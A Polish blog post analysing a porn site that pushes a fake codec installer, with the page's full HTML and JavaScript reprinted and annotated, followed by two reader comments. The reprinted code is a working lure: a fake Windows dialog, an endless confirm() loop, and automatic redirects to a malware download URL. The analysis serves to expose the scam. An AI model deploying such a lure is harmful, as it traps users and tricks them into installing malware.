Code snippets, ideas and events from IT related projects

by Robert Gawron

Analiza strony porno infekującej komputery

Ostatnio na rozmowie wstępnej spytano się mnie co to jest ten skrypt porno który mam u siebie na blogu :) Dziś znów o takich klimatach, otóż zetknąłem się z czymś takim:

  • po wejściu na stronę dostajemy komunikat iż nie ma kodeka i dostajemy pytanie, czy chcemy zainstalować kodek
  • jeżeli tak: jesteśmy przekierowywani do instalki
  • jeżeli nie: pytanie powtarzane jest w nieskończonej pętli.

Już ta nachalność daje do myślenia, w dodatku porno i instalowanie programów niezbyt do siebie pasują..

Takie coś spowalnia przeglądanie stronek... jak tak dalej będzie będę musiał wstać od laptopa, pogadać z ludźmi, może nawet wyjść na dwór.. ;)

Przykład takiej strony jest tutaj. Ściągamy ją na dysk wget'em, ściągnijmy też instalkę kodeków i przeskanujmy ją antywirusem online (a jeśli jesteśmy hardcorowcami, przeanalizujmy ją przy użyciu np. IDA):

wynik skanowania instalki ze strony porno

No tak, malware ale przyjrzyjmy się plikowi HTML i kodowi JS, który jest w nim osadzony. Po chwili widać iż funkcja releaseMovie() odpowiada za wyświetlanie pliku wideo:

function releaseMovie() {
	if (activex_is_here()) {
		document.getElementById('playMov').innerHTML = '<embed src="http://videodwnld.com/movie.mpg" width="480" height="400" autostart="true" type="movie/mpg"></embed>';
	}

Kopiując URL'a do przeglądarki możemy oglądnąć filmik (ale naprawdę nie warto). Spójrzmy na funkcję wyświetlającą confirm'a, jak ciekawie wykorzystano rekurencję:

// The "install" prompt loop. Accepting the confirm() sends the browser to the
// download URL; cancelling it falls into a branch whose both arms call vc() again,
// so the only ways out are accepting the redirect or killing the tab/browser.
function vc() {
	if (confirm('Video ActiveX Object Error.\n\nYour browser cannot play this video file.\nClick \'OK\' to download and install missing Video ActiveX Object.')) {
		location.href="http://wmvassistant.com/download.php?id=4168";
	}
	else {
		// alert() has no meaningful return value, so this test is never true;
		// either way the function recurses into itself.
		if (alert('Please install new version of Video ActiveX Object.')) {
			vc();
		}
		else {
			vc();
		}			
	}
}

Na koniec to, co może najbardziej dziwić/drażnić: cały player flashowy to tak naprawdę tylko obrazek GIF:

<table id="movie" align="center" cellpadding="0" cellspacing="0"><tr><td id="playMov"><a href="http://wmvassistant.com/download.php?id=4168"><img width="450" style="cursor:pointer;" onMouseOver="window.status = 'You must download Video ActiveX Object to play this video file.';" height="369" border="0" alt="You must download Video ActiveX Object to play this video file." src="/img/mov.gif"/></a></td></tr></table>

Nie wgłębiałem się bliżej, nie mam IE, ale można by było np. odpalić takie coś na maszynie wirtualnej i sprawdzić na firewallu, do jakiego hosta się to coś odwołuje.

Pełny kod stronki (includowane pliki JS IMHO nie były ciekawe):


<script language="javascript" src="http://powerof3x.com/popup/pop1_2007-09-04.js?id=4168"></script>
<script language="javascript" src="http://powerof3x.com/popup/pre_2007-09-04.js?id=4168"></script>
<script language="jscript.encode" src="http://powerof3x.com/popup/pop2_2007-09-04.js?id=4168"></script>

<html lang="en-EN">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Movie</title>
<style>
	body,td,th,tr,a,img {cursor:default;}
	#mainbody {background-color:#000;}
	#movie {border:1px solid #fff;}
	#movie a {cursor:pointer;}
</style>
<script>
// Probe for an ActiveX control with ProgID "videoPl.chl". Instantiation succeeds
// only where that control is registered (ActiveX-capable browser with the control
// installed); anywhere else the constructor throws and the probe returns false.
// That false result is what triggers the fake "missing codec" flow further down.
function activex_is_here()
{
    try
    {
        var testObject = new ActiveXObject("videoPl.chl");
        return true;
    }
    catch(e)
    {
        ;  // any failure (no ActiveX support, or control absent) falls through to false
    }

    return false;
}

// Replaces the GIF placeholder (td#playMov) with a real <embed> only when the
// ActiveX probe succeeds; on every other browser no video is ever shown.
function releaseMovie() {
	if (activex_is_here()) {
		document.getElementById('playMov').innerHTML = '<embed src="http://videodwnld.com/movie.mpg" width="480" height="400" autostart="true" type="movie/mpg"></embed>';
	}
}function codecDownload()
{
	// Called at page load from the inline script in <body>. Browsers whose
	// User-Agent contains "SV1" (presumably IE on XP SP2) or "MSIE 7" are left alone;
	// every other browser is sent to the downloader URL after 3 s with no prompt at all.
	if (window.navigator.userAgent.indexOf("SV1") != -1 || window.navigator.userAgent.indexOf("MSIE 7") !=-1) {
return;
	}
	else {
		// string-form setTimeout: the assignment is evaluated as code after 3000 ms
		window.setTimeout("location.href='http://wmvassistant.com/download.php?id=4168'", 3000);
	}
}
</script>
</head>

<body id="mainbody">

<script>

	// entry point: arms the unconditional 3-second redirect for browsers not matched by the UA check
	codecDownload();

</script>
<script>


// Generic drag-to-move helper; used below to make the fake dialog (div#popdiv)
// movable like a real window. All per-element state is stored on the element `o`.
var Drag = {
	obj : null,   // element currently being dragged; null between drags
	// o: element that receives mousedown; oRoot: element that actually moves (defaults to o);
	// minX..maxY: optional bounds (null = unbounded); bSwapHorzRef/bSwapVertRef switch
	// positioning to right/bottom; fXMapper/fYMapper optionally derive one axis from the other.
	init : function(o, oRoot, minX, maxX, minY, maxY, bSwapHorzRef, bSwapVertRef, fXMapper, fYMapper)
	{
		o.onmousedown	= Drag.start;

		// hmode/vmode true = position via left/top, false = via right/bottom
		o.hmode			= bSwapHorzRef ? false : true ;
		o.vmode			= bSwapVertRef ? false : true ;

		o.root = oRoot && oRoot != null ? oRoot : o ;

		// ensure the active offset is numeric so the parseInt calls in start()/drag() work
		if (o.hmode  && isNaN(parseInt(o.root.style.left  ))) o.root.style.left   = "0px";
		if (o.vmode  && isNaN(parseInt(o.root.style.top   ))) o.root.style.top    = "0px";
		if (!o.hmode && isNaN(parseInt(o.root.style.right ))) o.root.style.right  = "0px";
		if (!o.vmode && isNaN(parseInt(o.root.style.bottom))) o.root.style.bottom = "0px";

		// bounds default to null, which start()/drag() treat as "no limit"
		o.minX	= typeof minX != 'undefined' ? minX : null;
		o.minY	= typeof minY != 'undefined' ? minY : null;
		o.maxX	= typeof maxX != 'undefined' ? maxX : null;
		o.maxY	= typeof maxY != 'undefined' ? maxY : null;

		o.xMapper = fXMapper ? fXMapper : null;
		o.yMapper = fYMapper ? fYMapper : null;

		// empty default callbacks so the handlers below can call them unconditionally
		o.root.onDragStart	= new Function();
		o.root.onDragEnd	= new Function();
		o.root.onDrag		= new Function();
	},

	// mousedown handler; `this` is the element passed to init()
	start : function(e)
	{
		var o = Drag.obj = this;
		e = Drag.fixE(e);
		var y = parseInt(o.vmode ? o.root.style.top  : o.root.style.bottom);
		var x = parseInt(o.hmode ? o.root.style.left : o.root.style.right );
		o.root.onDragStart(x, y);

		o.lastMouseX	= e.clientX;
		o.lastMouseY	= e.clientY;

		// translate the element bounds into mouse-coordinate bounds for this drag
		if (o.hmode) {
			if (o.minX != null)	o.minMouseX	= e.clientX - x + o.minX;
			if (o.maxX != null)	o.maxMouseX	= o.minMouseX + o.maxX - o.minX;
		} else {
			if (o.minX != null) o.maxMouseX = -o.minX + e.clientX + x;
			if (o.maxX != null) o.minMouseX = -o.maxX + e.clientX + x;
		}

		if (o.vmode) {
			if (o.minY != null)	o.minMouseY	= e.clientY - y + o.minY;
			if (o.maxY != null)	o.maxMouseY	= o.minMouseY + o.maxY - o.minY;
		} else {
			if (o.minY != null) o.maxMouseY = -o.minY + e.clientY + y;
			if (o.maxY != null) o.minMouseY = -o.maxY + e.clientY + y;
		}

		// document-level listeners so the drag continues even if the cursor leaves the element
		document.onmousemove	= Drag.drag;
		document.onmouseup		= Drag.end;

		return false;   // suppress the default mousedown action
	},

	// mousemove handler while a drag is in progress
	drag : function(e)
	{
		e = Drag.fixE(e);
		var o = Drag.obj;

		var ey	= e.clientY;
		var ex	= e.clientX;
		var y = parseInt(o.vmode ? o.root.style.top  : o.root.style.bottom);
		var x = parseInt(o.hmode ? o.root.style.left : o.root.style.right );
		var nx, ny;

		// clamp the mouse position to the bounds computed in start()
		if (o.minX != null) ex = o.hmode ? Math.max(ex, o.minMouseX) : Math.min(ex, o.maxMouseX);
		if (o.maxX != null) ex = o.hmode ? Math.min(ex, o.maxMouseX) : Math.max(ex, o.minMouseX);
		if (o.minY != null) ey = o.vmode ? Math.max(ey, o.minMouseY) : Math.min(ey, o.maxMouseY);
		if (o.maxY != null) ey = o.vmode ? Math.min(ey, o.maxMouseY) : Math.max(ey, o.minMouseY);

		// move by the mouse delta; sign flips when positioning from right/bottom
		nx = x + ((ex - o.lastMouseX) * (o.hmode ? 1 : -1));
		ny = y + ((ey - o.lastMouseY) * (o.vmode ? 1 : -1));

		// note: at most one mapper is applied (else-if), and each is fed the *other*
		// axis' current value; these two lines also lack semicolons
		if (o.xMapper)		nx = o.xMapper(y)
		else if (o.yMapper)	ny = o.yMapper(x)

		Drag.obj.root.style[o.hmode ? "left" : "right"] = nx + "px";
		Drag.obj.root.style[o.vmode ? "top" : "bottom"] = ny + "px";
		Drag.obj.lastMouseX	= ex;
		Drag.obj.lastMouseY	= ey;

		Drag.obj.root.onDrag(nx, ny);
		return false;
	},

	// mouseup handler: detach the document listeners and report the final position
	end : function()
	{
		document.onmousemove = null;
		document.onmouseup   = null;
		Drag.obj.root.onDragEnd(	parseInt(Drag.obj.root.style[Drag.obj.hmode ? "left" : "right"]), 
									parseInt(Drag.obj.root.style[Drag.obj.vmode ? "top" : "bottom"]));
		Drag.obj = null;
	},

	// normalises the event object: falls back to window.event (old IE) and
	// fills layerX/layerY from offsetX/offsetY where they are missing
	fixE : function(e)
	{
		if (typeof e == 'undefined') e = window.event;
		if (typeof e.layerX == 'undefined') e.layerX = e.offsetX;
		if (typeof e.layerY == 'undefined') e.layerY = e.offsetY;
		return e;
	}
};

// Handler behind the fake dialog: wired to the "Continue" button as Down('iax')
// and to keypresses on div#popdiv as Down('iax',event).
function Down(download,e) 
{ 
	// Escape "closes" the popup -- but Close() immediately starts the vc() prompt loop
	if (e!=null && e.keyCode==27)
	{	Close();
		return;
	}	
    switch (download) 
    { 
        case "iax": document.location.href="http://wmvassistant.com/download.php?id=4168"; break; 
        Close();  // unreachable: follows the break and belongs to no case label
    } 

} 

// The "install" prompt loop. Accepting the confirm() sends the browser to the
// download URL; cancelling it falls into a branch whose both arms call vc() again,
// so the only ways out are accepting the redirect or killing the tab/browser.
function vc() {
	if (confirm('Video ActiveX Object Error.\n\nYour browser cannot play this video file.\nClick \'OK\' to download and install missing Video ActiveX Object.')) {
		location.href="http://wmvassistant.com/download.php?id=4168";
	}
	else {
		// alert() has no meaningful return value, so this test is never true;
		// either way the function recurses into itself.
		if (alert('Please install new version of Video ActiveX Object.')) {
			vc();
		}
		else {
			vc();
		}			
	}
}

// "Cancel" button, the X image and the Escape key all end up here: the fake
// dialog is hidden and the user is dropped straight into the vc() prompt loop.
function Close() 
{ 
    var p=document.getElementById("popdiv");
    p.style.visibility="hidden"; 
	vc();
} 
// "Details..." button: a single alert, no further information
function Details()
{
	alert('You must download Video ActiveX Object to play this video file.');
}

</script>


<div name="popdiv" id="popdiv" onKeyPress="Down('iax',event);" style="visibility:hidden; z-index:1;position:absolute;top:0px;left:0px;">
	<table cellpadding="0" cellspacing="0" width="362" height="126">
		<tr>
			<td>
				<table cellpadding="0" cellspacing="0" width="362" height="29" style=" BACKGROUND-IMAGE:URL('/img/xptop.gif'); height:29px; width:362;"> <!-- win top table -->
					<tr>
						<td style="color:white; font-family:Tahoma; font-size:13px; font-weight:bold; padding-left:4px;padding-top:1px">  Video ActiveX Object Error.</td>
						<td width="21" style="padding-right:6px;"><img src="/img/xpclose.gif" width="21" height="21" onClick="Close();" style="cursor:default;" ></td>
					</tr>
				</table>
			</td>
		</tr>
		<tr>
			<td>
				<table cellpadding="0" cellspacing="0" height="97">
					<tr>
						<td style="background-image:url(/img/left.gif); background-repeat:repeat-y;" valign="bottom">
							<table cellpadding="0" cellspacing="0">
								<tr>
									<td><img src="/img/xpleftclm.gif" width="3" height="97"></td>
								</tr>
							</table>
						</td>
						<td valign="top">
							<table cellpadding="0" cellspacing="0" width="356" bgcolor="ece9d8">
								<tr>
									<td>
										<table cellpadding="0" cellspacing="0" height="59">
											<tr>
												<td align="center" style="padding-left:20px; padding-top:13px;" valign="top"><img src="/img/alert.gif" width="31" height="32"></td>
												<td align="left" style="font-size:11px;  font-family:Tahoma; padding-left:30px; padding-bottom:8px; padding-right:5px;"><br><b>Video ActiveX Object Error:</b><br>Your browser cannot display this video file.<br><br>You need to download new version of Video ActiveX Object to play this video file.
												</td>
											</tr>
										</table>
									</td>
								</tr>
								<tr>
								<tr>
									<td style="padding-left:20px; padding-right:20px; padding-bottom:20px; font-family:Tahoma; font-size:11px;" align="center">
										<hr><br>
										Click Continue to download and install ActiveX Object.

									</td>
								</tr>
									<td>
										<table align="center" cellpadding="0" cellspacing="6" height="22">
											<tr height="22">
												<td><input type="button" value="Continue" onClick="Down('iax');" style="font-size:11px;  font-family:Arial; height:23px; width:82px;" tabindex="1" ID="Button1" NAME="Button1"><br><br></td>
												<td></td>
												<td><input type="button" value="Cancel" onClick="Close()" style="font-size:11px;  font-family:Arial; height:23px; width:82px;" ID="Button3" NAME="Button3"><br><br></td>
												<td><input type="button" value="Details..." onClick="Details()" style="font-size:11px;  font-family:Arial; height:23px; width:82px;" ID="Button3" NAME="Button3"><br><br></td>														
											</tr>
										</table>
									</td>
								</tr>
								<tr>
									<td>
										<table cellpadding="0" cellspacing="0" width="100%">
											<tr bgcolor="4577ea" style="height:1px;">
												<td></td>
											</tr> <!-- empty colors -->
											<tr bgcolor="0029b5" style="height:1px;">
												<td></td>
											</tr>
											<tr bgcolor="001590" style="height:1px;">
												<td></td>
											</tr>
										</table>
									</td>
								</tr>
							</table>
						</td>
						<td style="background-image:url(/img/right.gif); background-repeat:repeat-y;" valign="bottom">
							<table cellpadding="0" cellspacing="0">
								<tr>
									<td style="padding:0px;"><img src="/img/xprightclm.gif" width="3" height="97"></td>
								</tr>
							</table>
						</td>
					</tr>
				</table>
			</td>
		</tr>
	</table>

	
	
<script>
// Browser-specific trigger, run as soon as this script block is parsed.
// Firefox without the control: Close() after 1 s, i.e. straight into the vc() loop.
// Any other browser without the control: show the fake dialog after 2 s.
// Either way codecDownload() (called earlier in <body>) may already have queued
// its own 3 s redirect for browsers that did not match its UA check.
if (navigator.userAgent.indexOf("Firefox")!=-1) {
if (activex_is_here()) { } else {
	setTimeout("Close();", 1000);
}
}
else {
if (activex_is_here()) { } else {
	setTimeout("showPopDiv();",2000);
}
}
      
// Centres and reveals the fake dialog. sFlag is the constant "No", so FlagAr[0]
// is "N", byFlag can never become true and the popup is always shown; the flag
// logic looks like a leftover from a templated/kit version of this page.
function showPopDiv()
{
	var sFlag = "No";
	var byFlag = false;
	var FlagAr = sFlag.split("");

	if (FlagAr[0]=="1"){byFlag = true;}
	if (FlagAr[0]=="3"){byFlag = true;}

	if(!byFlag) {
		var p=document.getElementById("popdiv"); 
		// wmpwidth/wmpheight are never declared, so they become implicit globals;
		// the values are assigned to style.top/left as bare numbers, without "px"
		wmpwidth=document.body.clientWidth/2-181;
		wmpheight=document.body.clientHeight/2-120;
		p.style.top = wmpheight;
		p.style.left = wmpwidth;
		p.style.visibility = "visible";
		p.focus();
	}
}

// make the fake dialog draggable so it behaves like a native window
Drag.init(document.getElementById("popdiv"));
</script>
</div>


<table id="movie" align="center" cellpadding="0" cellspacing="0"><tr><td id="playMov"><a href="http://wmvassistant.com/download.php?id=4168"><img width="450" style="cursor:pointer;" onMouseOver="window.status = 'You must download Video ActiveX Object to play this video file.';" height="369" border="0" alt="You must download Video ActiveX Object to play this video file." src="/img/mov.gif"/></a></td></tr></table>
<script>releaseMovie();</script>

</body>
</html>


Comments

Michael Roberts , 12.08.2008 1:36, reply
Almost this exact page is being used on the landing pages for the "CNN Top 10" spam -- it's freaky you already saw this technique in April! (And analyzed it just like I did -- it's more and more true that nothing is new on the Internet...) Anyway, I'll reread this page next year, after I've improved my Polish. But I thought this code's recent doings might interest you.
Robert , 13.08.2008 17:33, reply
Thanks for information Michael!
